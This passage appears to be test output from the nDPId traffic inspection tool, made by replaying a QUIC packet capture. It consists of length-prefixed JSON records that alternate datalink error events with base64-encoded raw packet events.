QHVQAog3tdzv9W41nAoK4IAxMzmRS\/zaP1oEM3W4YTHPbnzSNf0lfovw7e1kQJ81BmEbUHHgPAH0AE71rB0tD9W3Srmn2+mJn8\/1jMlvBdJrZiF8pwG1RiWfrmB6S0SeHnS3JBD9pnVLEE0EC9rpzv0HOwgmfIEZ2e91rUGeNQWa2ZdmyL2moYYmUY07FeeAJg\/VoZocP6wlZf9GIB0poFd9s6uzAHgzwyuuPOi+K\/E6Thb\/bj0dUUkmJSiAWvqvsyG\/viZePH1a7Y5LlatLrkBseK+fIHF2IeXcHYw1RRoaZk31jvao1bT9SG3be1BEYMmRzVmgoZ9uMApjPk4MJBosCB\/GdPnpYv5TGTtVYwcwUq2KOTXQGMUEhXek2H26046HyBM8QM8\/SCVF+DzzW9kmCcSXV5KM38r2QMylsdZl7wNg6bwldr5zP5L9qv38CNlKcdYT+yB70BFHvTo37Wgrs20s0mHt4ewulsBhOOGPPfHQMNxvcWc7uAJLooszqRF7J6l+IqeCnFE43NXXLX7OvHkzewfl8Ft0TNxRdvatOMKJFyCIrK6jPyUo8aJ7f9XsxmZSVE8SWljrKSyed6CB7bd8hr29T93KTUMOhN\/MhNLjG4j9c4Jw4JrLFQdLC3eLhokCoF9QG2MQmCdfrSSdUDmbeGEAPJA2YiLgpNg5\/2WSTs+1A7vkuTwCZENtx0VwEmlZmKbcL2S5Y1kCG4Tb2dujIYZflBJieBpy+Ig4qUMAkhXn281uwu\/u2KoqVY4r2FqsEBSpKRrhNgU24OI9\/\/Lmi9otouSi99KWfiN0Dftj23M1DeFPm\/TYfSfZZNDXMl5sIOHfKBlGxE\/4oJA+No2ohJW6llEwaxOj1bMe6BIHQplpRrKrWLkzD9wrNOc+L0VndBSuFub1YuUON86BbmvDYFPYVVHT61PyAhSOUznddrHvJLxe+XeHeeAOgiZltYBKrVgvVqqaszO\/GNEfYB\/H1e0FZxGGtLo67RsKmVjm2eGg2nhTtTy+9Am\/HUIlcW8qOqZYHvdy6wih6ywSb9hS2QYk1sOVxQBWBk9S78lrEZCqczNdpaRV\/6JFwOgtQ0mW0ipYHj89bKxNkZS70lMqo+wvX4hn2E7sZjRZiLCvVZdXH0SJgB96w5aatwV+s6N8G2jyivx0J6eSd8oaQa\/xqNUbMZjYh9DuEe95PYj3TS0M6a7xD2hGh2BCkdIYc\/gBW8GtnAYpnqFYvf4JJywPC3s\/sb75drDFNyHQzWVAyqQa8RR4jO7oFewaeNG1KLgteLvXIcQ0VPmSg9xsbcHBSOW0t0GneypiO2SBMhC8roPFdwiPod0xVTfed2PI="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":65,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296872} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":65,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAOwZ4AABAEQC5CuYoqF5h4ZLy9AG7ACdP+llAAkdWAc94e8S4xAIqpLUtObS1mewsVqAU\/Q3btMo="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":66,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296872} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":66,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAOwZ4AABAEQC5CuYoqF5h4ZLy9AG7ACdP+llAAkdWAc94e8S4xAIqpLUtObS1mewsVqAU\/Q3btMo="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":67,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296872} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":67,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgAOwZ4AABAEQCBCuYoqF5h4ZLy9AG7ACdP+llAAkdWAc94e8S4xAIqpLUtObS1mewsVqAU\/Q3btMo="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":68,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296874} -02018{"packet_event_id":1,"packet_event_name":"packet","packet_id":68,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAAQABZEalrXmHhkgrmKKgBu\/L0BOyhhE1YBLGOUcd9D5UeX9\/bV1tgj55BFm+xlZy+AxflQx+I2QYJRr\/\/os6E+R7IvQZEqyeiF0uQk2Bv0RgZS3Pt\/i7Hfwh5cxdXC0X3qGdJU7RyfXg3wDQwAZxZztzHN3O\/E19ypW\/NImYK7o1OMumbH+8+owO60gL2bLB3\/e+lq8D5GQDuD\/QTSQTgnWu8C1LTM3kdeax08ou1uGXv\/UVkCz9+cXA70ACIytfBfvN6+evbF8JNtICH4DXhP2pCqlT35mcsegsOnKO6hLA5FWcYuXtT\/Pw0sEbe4GMY+6zm6y3iHOsGSwrbtxKbIKRxpUWtBJwXoMa11b9qGoNgHdFIJt8Qc\/veNiilZdJYguBJG9hwG\/yA\/zB1oEKbTqziYkOpAoT8aWtj7d9Mw+XgBgWP0l5qWVFn0i5BojcbwQ4y5iGpDc1obd047iF+avbv47FXhN00t\/4ns99OB5ApFIACgxW+tIkF1JCVnmZx\/yzimMt8INIEP30OYZo970grcviSqUFkfg8JkZIjlILUCdOiDB0wdfbV+LRr\/rKpLfSNjVhuKbVkJx9bW1LuqVhMPZnQfYbOdFMG\/KqKFHQz7FaQjS6lpcFBRTLUiyVUlW53l7khjWKbgURaO9BKJpxwCaD3mPAhiuASBmPHB5Ay29URTR1eB62jOWMOvzsM\/ruqy9HkegPA1bP46x+H72Eiao2dD2GoUQDOOz1G1OIjHs5IMkOJf8uy4bqFGKaMWEHtIoCY+haCrBYx0kAQZpvzKljtiyfN4NFpbPRrXRnjydEOjh7I9znCIvWFyrCwkN6IX62xDtDUEuvv\/BMmPEPhohLR2T8B3M229QkhmMciji1Q1dLSvFVpsKR1cHF6Ms9UzX8AwP36MS2iSsON9hBM+dVBHj5Wbceq1yodvE0QcD54MholGIGl\/6z2IxyawRoI6wy1qg9W2IjttVTtwtJq9M3sWemDuLr35r9fmzMJexZLpnkopRzYfs8By4ugoSyeK1Zr8zRU0xErho8kiV7cRdEqEr09ztnMxn2UDaCzBvi\/FMOKS8t8Ss1qD9Ccz3Wq6fcmNZcWuJA5tih\/oY9ndiO6yowlbChXLSTLrq4LZX32t3FoqoNFsNSCAD\/ukxjFNJcU54ntUgEslCj37e2zc85XkZ5cuO0oNT7vKI6c4lvItwsn3odqSFgsO8ivzN38yLtjUpUNY1pHZ27++zjty6UHJoDOR3kxmjA5SsTI+8T74CQajlQKNxH\/\/0zmg1HcauSuEIvFeqKNENItqbUcP+i4NaWN07VA0caWwFALah\/+u9A53HANFbsc94zPuYI+9k49KyAPwYp3XXSIvscca7EyWf6cRW6VQNEgVLtFf6ailRE6Lp1S5ExCQBdxbWM5YhSzpVknAL111wxI5U\/4cC3yHzbnPBwty4KE3PiLMnAgNx1\/N9BlSG7Kj+BNWGNKhFGWTP4zHH7vwQMq52WpKcgNqufmQdTuVwezRC3PeKdgAXPM0w\/BPnIz4U9Qob00NfbbciTtcXt6HJYKbzRle2i7Moze0NvitM7Wax5HvOALs8PeDwYlizXOU4lOgjr+z1tQqdIKsSFLczKA8VuEShK5NmtPUTBZO7U7xwcQTSBqjv5nfER3Xysh5a3WKwEQ0eqN0fj821sMIzVIOUCwUKtZOctj0Dw="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":69,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296874} -02018{"packet_event_id":1,"packet_event_name":"packet","packet_id":69,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAAQABZEalrXmHhkgrmKKgBu\/L0BOyhhE1YBLGOUcd9D5UeX9\/bV1tgj55BFm+xlZy+AxflQx+I2QYJRr\/\/os6E+R7IvQZEqyeiF0uQk2Bv0RgZS3Pt\/i7Hfwh5cxdXC0X3qGdJU7RyfXg3wDQwAZxZztzHN3O\/E19ypW\/NImYK7o1OMumbH+8+owO60gL2bLB3\/e+lq8D5GQDuD\/QTSQTgnWu8C1LTM3kdeax08ou1uGXv\/UVkCz9+cXA70ACIytfBfvN6+evbF8JNtICH4DXhP2pCqlT35mcsegsOnKO6hLA5FWcYuXtT\/Pw0sEbe4GMY+6zm6y3iHOsGSwrbtxKbIKRxpUWtBJwXoMa11b9qGoNgHdFIJt8Qc\/veNiilZdJYguBJG9hwG\/yA\/zB1oEKbTqziYkOpAoT8aWtj7d9Mw+XgBgWP0l5qWVFn0i5BojcbwQ4y5iGpDc1obd047iF+avbv47FXhN00t\/4ns99OB5ApFIACgxW+tIkF1JCVnmZx\/yzimMt8INIEP30OYZo970grcviSqUFkfg8JkZIjlILUCdOiDB0wdfbV+LRr\/rKpLfSNjVhuKbVkJx9bW1LuqVhMPZnQfYbOdFMG\/KqKFHQz7FaQjS6lpcFBRTLUiyVUlW53l7khjWKbgURaO9BKJpxwCaD3mPAhiuASBmPHB5Ay29URTR1eB62jOWMOvzsM\/ruqy9HkegPA1bP46x+H72Eiao2dD2GoUQDOOz1G1OIjHs5IMkOJf8uy4bqFGKaMWEHtIoCY+haCrBYx0kAQZpvzKljtiyfN4NFpbPRrXRnjydEOjh7I9znCIvWFyrCwkN6IX62xDtDUEuvv\/BMmPEPhohLR2T8B3M229QkhmMciji1Q1dLSvFVpsKR1cHF6Ms9UzX8AwP36MS2iSsON9hBM+dVBHj5Wbceq1yodvE0QcD54MholGIGl\/6z2IxyawRoI6wy1qg9W2IjttVTtwtJq9M3sWemDuLr35r9fmzMJexZLpnkopRzYfs8By4ugoSyeK1Zr8zRU0xErho8kiV7cRdEqEr09ztnMxn2UDaCzBvi\/FMOKS8t8Ss1qD9Ccz3Wq6fcmNZcWuJA5tih\/oY9ndiO6yowlbChXLSTLrq4LZX32t3FoqoNFsNSCAD\/ukxjFNJcU54ntUgEslCj37e2zc85XkZ5cuO0oNT7vKI6c4lvItwsn3odqSFgsO8ivzN38yLtjUpUNY1pHZ27++zjty6UHJoDOR3kxmjA5SsTI+8T74CQajlQKNxH\/\/0zmg1HcauSuEIvFeqKNENItqbUcP+i4NaWN07VA0caWwFALah\/+u9A53HANFbsc94zPuYI+9k49KyAPwYp3XXSIvscca7EyWf6cRW6VQNEgVLtFf6ailRE6Lp1S5ExCQBdxbWM5YhSzpVknAL111wxI5U\/4cC3yHzbnPBwty4KE3PiLMnAgNx1\/N9BlSG7Kj+BNWGNKhFGWTP4zHH7vwQMq52WpKcgNqufmQdTuVwezRC3PeKdgAXPM0w\/BPnIz4U9Qob00NfbbciTtcXt6HJYKbzRle2i7Moze0NvitM7Wax5HvOALs8PeDwYlizXOU4lOgjr+z1tQqdIKsSFLczKA8VuEShK5NmtPUTBZO7U7xwcQTSBqjv5nfER3Xysh5a3WKwEQ0eqN0fj821sMIzVIOUCwUKtZOctj0Dw="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":70,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296874} -02018{"packet_event_id":1,"packet_event_name":"packet","packet_id":70,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgFAAAAQABZEakzXmHhkgrmKKgBu\/L0BOyhhE1YBLGOUcd9D5UeX9\/bV1tgj55BFm+xlZy+AxflQx+I2QYJRr\/\/os6E+R7IvQZEqyeiF0uQk2Bv0RgZS3Pt\/i7Hfwh5cxdXC0X3qGdJU7RyfXg3wDQwAZxZztzHN3O\/E19ypW\/NImYK7o1OMumbH+8+owO60gL2bLB3\/e+lq8D5GQDuD\/QTSQTgnWu8C1LTM3kdeax08ou1uGXv\/UVkCz9+cXA70ACIytfBfvN6+evbF8JNtICH4DXhP2pCqlT35mcsegsOnKO6hLA5FWcYuXtT\/Pw0sEbe4GMY+6zm6y3iHOsGSwrbtxKbIKRxpUWtBJwXoMa11b9qGoNgHdFIJt8Qc\/veNiilZdJYguBJG9hwG\/yA\/zB1oEKbTqziYkOpAoT8aWtj7d9Mw+XgBgWP0l5qWVFn0i5BojcbwQ4y5iGpDc1obd047iF+avbv47FXhN00t\/4ns99OB5ApFIACgxW+tIkF1JCVnmZx\/yzimMt8INIEP30OYZo970grcviSqUFkfg8JkZIjlILUCdOiDB0wdfbV+LRr\/rKpLfSNjVhuKbVkJx9bW1LuqVhMPZnQfYbOdFMG\/KqKFHQz7FaQjS6lpcFBRTLUiyVUlW53l7khjWKbgURaO9BKJpxwCaD3mPAhiuASBmPHB5Ay29URTR1eB62jOWMOvzsM\/ruqy9HkegPA1bP46x+H72Eiao2dD2GoUQDOOz1G1OIjHs5IMkOJf8uy4bqFGKaMWEHtIoCY+haCrBYx0kAQZpvzKljtiyfN4NFpbPRrXRnjydEOjh7I9znCIvWFyrCwkN6IX62xDtDUEuvv\/BMmPEPhohLR2T8B3M229QkhmMciji1Q1dLSvFVpsKR1cHF6Ms9UzX8AwP36MS2iSsON9hBM+dVBHj5Wbceq1yodvE0QcD54MholGIGl\/6z2IxyawRoI6wy1qg9W2IjttVTtwtJq9M3sWemDuLr35r9fmzMJexZLpnkopRzYfs8By4ugoSyeK1Zr8zRU0xErho8kiV7cRdEqEr09ztnMxn2UDaCzBvi\/FMOKS8t8Ss1qD9Ccz3Wq6fcmNZcWuJA5tih\/oY9ndiO6yowlbChXLSTLrq4LZX32t3FoqoNFsNSCAD\/ukxjFNJcU54ntUgEslCj37e2zc85XkZ5cuO0oNT7vKI6c4lvItwsn3odqSFgsO8ivzN38yLtjUpUNY1pHZ27++zjty6UHJoDOR3kxmjA5SsTI+8T74CQajlQKNxH\/\/0zmg1HcauSuEIvFeqKNENItqbUcP+i4NaWN07VA0caWwFALah\/+u9A53HANFbsc94zPuYI+9k49KyAPwYp3XXSIvscca7EyWf6cRW6VQNEgVLtFf6ailRE6Lp1S5ExCQBdxbWM5YhSzpVknAL111wxI5U\/4cC3yHzbnPBwty4KE3PiLMnAgNx1\/N9BlSG7Kj+BNWGNKhFGWTP4zHH7vwQMq52WpKcgNqufmQdTuVwezRC3PeKdgAXPM0w\/BPnIz4U9Qob00NfbbciTtcXt6HJYKbzRle2i7Moze0NvitM7Wax5HvOALs8PeDwYlizXOU4lOgjr+z1tQqdIKsSFLczKA8VuEShK5NmtPUTBZO7U7xwcQTSBqjv5nfER3Xysh5a3WKwEQ0eqN0fj821sMIzVIOUCwUKtZOctj0Dw="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":71,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296888} -00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":71,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQAzFAABAEfpmCuYoqF5h4ZLy9AG7ACyU00JAAkdWAc94e8lF8bV8vJZQtf3Pzp7jcd4UtooMYMN3HiXhjg=="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":72,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296888} -00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQAzFAABAEfpmCuYoqF5h4ZLy9AG7ACyU00JAAkdWAc94e8lF8bV8vJZQtf3Pzp7jcd4UtooMYMN3HiXhjg=="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":73,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296888} -00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":73,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgAQAzFAABAEfouCuYoqF5h4ZLy9AG7ACyU00JAAkdWAc94e8lF8bV8vJZQtf3Pzp7jcd4UtooMYMN3HiXhjg=="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":74,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296903} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":74,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAO3ZmAABAEZDKCuYoqF5h4ZLy9AG7ACeNg0JAAkdWAc94e7tU\/REFNVwMVrtyTysMFRZq3aFvugI="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":75,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296903} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":75,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAO3ZmAABAEZDKCuYoqF5h4ZLy9AG7ACeNg0JAAkdWAc94e7tU\/REFNVwMVrtyTysMFRZq3aFvugI="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":76,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296904} -00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":59,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":59,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgAO3ZmAABAEZCSCuYoqF5h4ZLy9AG7ACeNg0JAAkdWAc94e7tU\/REFNVwMVrtyTysMFRZq3aFvugI="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":77,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296906} -02018{"packet_event_id":1,"packet_event_name":"packet","packet_id":77,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAAQABZEalrXmHhkgrmKKgBu\/L0BOxTck0RbRMAY7MLrV782PL5vFtS1n0ArFkj3jC1RQTMo5lkLTdbYZ4fx+4MKlBNo4HRyYQr19BRJtjkAtnEhE0khWZBCUcuztvoS3ULAwG3gqw+Su3FC5IV\/rT98UziWpFvnqswP7HT1FQXbt\/53SOdspEx03BVTgEv3zM+WYj5PGBHWdkcNZIIGDHrfHwsYFq0pIkf7ANpw46hMWGUHkKPloJpXFXOlgi1\/1VT2dZ7JM4r9Q3s4XE4BApoN2p+QOJWjyS2QkspSvgcYUJjg4mRaLerxCZV4x7nNjm5bGiBI8fd8TElJPxY9je8OG0\/05zYX0pABY3xP1n22i2dk89AM8H9SYgiQPC6f3+dCGX4CZcwQrUs\/3noQV8E\/y12n8BHHLC4GRpt+kJpgiRbcR31g9YIDkThIlAm0Y+C\/1woawbwj6xL9pMbJv3AXpCSytjKHU5uWC+WmekbzJ9LlqxXwOF5KiEktAoNaZ7t7\/xXDwS+EY0icEw7qBvd7ImnGKIhHgQ6XWmpWi4Ix1kKTJ6sOc+lCL5MIONU3t9bgscJVDMynSBvpM0K07\/jO52fq8CMfV7w9sxwuDBAxsgvzuTzH7EJ\/fQY1MvA6Wc+8wCNAG5TEk7oa11c92\/+eirMPO0A+nYVihGs3xaM9b4i5tUNy5kp93TYYO36uC6zSAjzHn6awUHeL\/XnpvZQ2vhxRkc0P\/eFShn4LRBuTYTzWUMn64UVkLZasyDhbSEYrN+ZyM0VzT8Lvn5h6Zl+sGiAE+caKk2Dy22lEVFfBf5z41whoe6fLK6rNp\/NVSk0hDg75OCPSELLvDMANPXXCsxtQs0OXeOZvrGRIxV\/lRR4yMPbsNSX0kyzrmz3kzyZecEPjYPBabyeKAbxPY\/RDJlK+qKa7q+w75+ZPyhQ9ozz\/WK3ePm3CffR9DZIc3Ae1r9KAB+ffui9BAVGFnx2n5LOC+m8g4tvlbwCeYuL9jlScxtJY\/OGnvHECUg+9t4CeP8LDoaEQJ3Ztzf6x+oKQkmu6bAqa7Ry\/gIepYceJEr4exT4+4VVAOsuMnToTcPqCCM38+5u3u60FQjjG3l5eaH2yHOohsImhcUJjkAU3d4UamjwMGkj6zKTccGWrW7mxUYDzD9W+LgNECRr4F3R3Wb4uwT5hbEobhcJESOC5lMRU9kO2HxgzK\/E3Qms5P3dDV7hdwwCTySevDGJoLNicifc+uGzg+FK9mWWb0sYz1r2nQDGZy7YJF9\/N2xn9wQcSyZ+3IbfY+Sf7XnetJMzJ5Y2RjgHQpUN\/HVY5A\/\/cwH7Q46181JvdaYzyk\/MWcvRAVaveFLZOljyBUgIyPwZouPGBG1ZPlqC1nZLAuJ+xvSgXdjRvUln3T76wITEDqV0oaz7bViSNx6FXFAW3Hf7tHJxxcRGQOCplnvunCUxSWhip1zUBnNr8sP84ChFcpc0BQBrmrxHOnkDycev\/xxHR4Up1CiU7u3HON1ngFJEdEMkVRDB2tPFw4X1L9elj\/I6TBAWxcw5PGYBIAl56v5Q7IMO2PyVfx2Xa\/siEV5Axfvhr35x31OHyD5yqFTv85jle6IzSrpMWjOH2MKKS9y6qqMoRF35xznhCf9ri3+Ncjo3G0Js3Bw2wzPkU3X3pUPhlzku2j8G3SU571wbCwj5Jyo\/f4s04GAi4UE="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":78,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296906} -02018{"packet_event_id":1,"packet_event_name":"packet","packet_id":78,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAAQABZEalrXmHhkgrmKKgBu\/L0BOxTck0RbRMAY7MLrV782PL5vFtS1n0ArFkj3jC1RQTMo5lkLTdbYZ4fx+4MKlBNo4HRyYQr19BRJtjkAtnEhE0khWZBCUcuztvoS3ULAwG3gqw+Su3FC5IV\/rT98UziWpFvnqswP7HT1FQXbt\/53SOdspEx03BVTgEv3zM+WYj5PGBHWdkcNZIIGDHrfHwsYFq0pIkf7ANpw46hMWGUHkKPloJpXFXOlgi1\/1VT2dZ7JM4r9Q3s4XE4BApoN2p+QOJWjyS2QkspSvgcYUJjg4mRaLerxCZV4x7nNjm5bGiBI8fd8TElJPxY9je8OG0\/05zYX0pABY3xP1n22i2dk89AM8H9SYgiQPC6f3+dCGX4CZcwQrUs\/3noQV8E\/y12n8BHHLC4GRpt+kJpgiRbcR31g9YIDkThIlAm0Y+C\/1woawbwj6xL9pMbJv3AXpCSytjKHU5uWC+WmekbzJ9LlqxXwOF5KiEktAoNaZ7t7\/xXDwS+EY0icEw7qBvd7ImnGKIhHgQ6XWmpWi4Ix1kKTJ6sOc+lCL5MIONU3t9bgscJVDMynSBvpM0K07\/jO52fq8CMfV7w9sxwuDBAxsgvzuTzH7EJ\/fQY1MvA6Wc+8wCNAG5TEk7oa11c92\/+eirMPO0A+nYVihGs3xaM9b4i5tUNy5kp93TYYO36uC6zSAjzHn6awUHeL\/XnpvZQ2vhxRkc0P\/eFShn4LRBuTYTzWUMn64UVkLZasyDhbSEYrN+ZyM0VzT8Lvn5h6Zl+sGiAE+caKk2Dy22lEVFfBf5z41whoe6fLK6rNp\/NVSk0hDg75OCPSELLvDMANPXXCsxtQs0OXeOZvrGRIxV\/lRR4yMPbsNSX0kyzrmz3kzyZecEPjYPBabyeKAbxPY\/RDJlK+qKa7q+w75+ZPyhQ9ozz\/WK3ePm3CffR9DZIc3Ae1r9KAB+ffui9BAVGFnx2n5LOC+m8g4tvlbwCeYuL9jlScxtJY\/OGnvHECUg+9t4CeP8LDoaEQJ3Ztzf6x+oKQkmu6bAqa7Ry\/gIepYceJEr4exT4+4VVAOsuMnToTcPqCCM38+5u3u60FQjjG3l5eaH2yHOohsImhcUJjkAU3d4UamjwMGkj6zKTccGWrW7mxUYDzD9W+LgNECRr4F3R3Wb4uwT5hbEobhcJESOC5lMRU9kO2HxgzK\/E3Qms5P3dDV7hdwwCTySevDGJoLNicifc+uGzg+FK9mWWb0sYz1r2nQDGZy7YJF9\/N2xn9wQcSyZ+3IbfY+Sf7XnetJMzJ5Y2RjgHQpUN\/HVY5A\/\/cwH7Q46181JvdaYzyk\/MWcvRAVaveFLZOljyBUgIyPwZouPGBG1ZPlqC1nZLAuJ+xvSgXdjRvUln3T76wITEDqV0oaz7bViSNx6FXFAW3Hf7tHJxxcRGQOCplnvunCUxSWhip1zUBnNr8sP84ChFcpc0BQBrmrxHOnkDycev\/xxHR4Up1CiU7u3HON1ngFJEdEMkVRDB2tPFw4X1L9elj\/I6TBAWxcw5PGYBIAl56v5Q7IMO2PyVfx2Xa\/siEV5Axfvhr35x31OHyD5yqFTv85jle6IzSrpMWjOH2MKKS9y6qqMoRF35xznhCf9ri3+Ncjo3G0Js3Bw2wzPkU3X3pUPhlzku2j8G3SU571wbCwj5Jyo\/f4s04GAi4UE="} -00197{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":79,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296906} -02018{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgFAAAAQABZEakzXmHhkgrmKKgBu\/L0BOxTck0RbRMAY7MLrV782PL5vFtS1n0ArFkj3jC1RQTMo5lkLTdbYZ4fx+4MKlBNo4HRyYQr19BRJtjkAtnEhE0khWZBCUcuztvoS3ULAwG3gqw+Su3FC5IV\/rT98UziWpFvnqswP7HT1FQXbt\/53SOdspEx03BVTgEv3zM+WYj5PGBHWdkcNZIIGDHrfHwsYFq0pIkf7ANpw46hMWGUHkKPloJpXFXOlgi1\/1VT2dZ7JM4r9Q3s4XE4BApoN2p+QOJWjyS2QkspSvgcYUJjg4mRaLerxCZV4x7nNjm5bGiBI8fd8TElJPxY9je8OG0\/05zYX0pABY3xP1n22i2dk89AM8H9SYgiQPC6f3+dCGX4CZcwQrUs\/3noQV8E\/y12n8BHHLC4GRpt+kJpgiRbcR31g9YIDkThIlAm0Y+C\/1woawbwj6xL9pMbJv3AXpCSytjKHU5uWC+WmekbzJ9LlqxXwOF5KiEktAoNaZ7t7\/xXDwS+EY0icEw7qBvd7ImnGKIhHgQ6XWmpWi4Ix1kKTJ6sOc+lCL5MIONU3t9bgscJVDMynSBvpM0K07\/jO52fq8CMfV7w9sxwuDBAxsgvzuTzH7EJ\/fQY1MvA6Wc+8wCNAG5TEk7oa11c92\/+eirMPO0A+nYVihGs3xaM9b4i5tUNy5kp93TYYO36uC6zSAjzHn6awUHeL\/XnpvZQ2vhxRkc0P\/eFShn4LRBuTYTzWUMn64UVkLZasyDhbSEYrN+ZyM0VzT8Lvn5h6Zl+sGiAE+caKk2Dy22lEVFfBf5z41whoe6fLK6rNp\/NVSk0hDg75OCPSELLvDMANPXXCsxtQs0OXeOZvrGRIxV\/lRR4